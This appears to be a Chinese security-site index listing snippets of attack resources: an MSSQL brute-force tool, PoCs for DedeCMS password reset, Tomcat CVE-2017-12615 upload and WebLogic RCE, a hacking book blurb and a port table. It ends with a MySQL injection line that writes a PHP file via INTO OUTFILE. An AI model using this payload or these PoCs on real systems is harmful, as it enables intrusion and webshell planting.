Mssql爆破工具源码
Windows C++版
// MssqlCrake.cpp : 定义控制台应用程序的入口点。
//
#include "stdafx.h"
#include
#include
#pragma comment(lib...
DeDecms(织梦CMS)最新版任意用户密码重置漏洞POC
poc
# coding=utf-8
import re
import requests
from bs4 import BeautifulSoup
if __name__ == "__main__":
...
【CVE-2017-12615】Tomcat任意文件上传漏洞POC
前言:
记Tomcat开启PUT后的任意文件上传
影响版本:
7.0.0 – 7.0.81
需要因素:
conf/web.xml文件添加readonly参数,属性值为false
#! -*- coding:utf-8...
Weblogic wls RCE 漏洞验证POC
#!/usr/bin/env python
# coding:utf-8
# @Date : 2017/12/22 17:11
# @File : weblogic_poc.py
# @Author : sevck (...
黑客攻防技术宝典 浏览器实战篇(带书签版)
内容简介
本书由世界杰出黑客打造,细致讲解了IE、Firefox、Chrome等主流浏览器及其扩展和应用上的安全问题和漏洞,介绍了大量的攻击和防御技术,具体内容包括:初始控制,持续控制,绕过同源策略,攻击用户...
windows通用服务器端口号查询表
1 tcpmux TCP 端口服务多路复用
5 rje 远程作业入口
7 echo Echo 服务
9 discard 用于连接测试的空服务
11 systat 用于列举连接了...
mysql注入写文件
select * from admin where id =-1 union select 1,'<?php phpinfo();?>',3,4 into outfile 'c:\\1.php'
sele...